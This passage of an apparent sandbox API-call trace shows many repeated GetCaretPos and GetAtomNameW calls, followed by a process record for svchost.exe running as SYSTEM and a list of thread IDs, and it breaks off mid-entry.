GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.863] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.863] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.864] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.864] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.865] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.865] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.866] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.866] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.867] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.867] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.868] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.868] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.869] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.869] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0127.870] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0127.870] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 52 os_tid = 0xbb8 Thread: id = 53 os_tid = 0xbc0 Thread: id = 54 os_tid = 0x1c4 Thread: id = 55 os_tid = 0x640 Thread: id = 56 os_tid = 0x40c Thread: id = 57 os_tid = 0x7c8 Thread: id = 58 os_tid = 0x5d8 Thread: id = 59 os_tid = 0x320 Thread: id = 60 os_tid = 0x42c Thread: id = 61 os_tid = 0x1e4 Thread: id = 62 os_tid = 0x75c Thread: id = 63 os_tid = 0x6d0 Thread: id = 64 os_tid = 0x6bc Thread: id = 65 os_tid = 0x6b0 Thread: id = 66 os_tid = 0x69c Thread: id = 67 os_tid = 0x698 Thread: id = 68 os_tid = 0x684 Thread: id = 69 os_tid = 0x678 Thread: id = 70 os_tid = 0x4a8 Thread: id = 71 os_tid = 0x46c Thread: id = 72 os_tid = 0x44c Thread: id = 73 os_tid = 0x424 Thread: id = 74 os_tid = 0x41c Thread: id = 75 os_tid = 0x404 Thread: id = 76 os_tid = 0x14c Thread: id = 77 os_tid = 0x158 Thread: id = 78 os_tid = 0x3fc Thread: id = 79 os_tid = 0x3f4 Thread: id = 80 os_tid = 0x3e8 Thread: id = 81 os_tid = 0x39c Thread: id = 82 os_tid = 0x390 Thread: id = 83 os_tid = 0x37c Thread: id = 84 os_tid = 0x374 Thread: id = 86 os_tid = 0x958 Thread: id 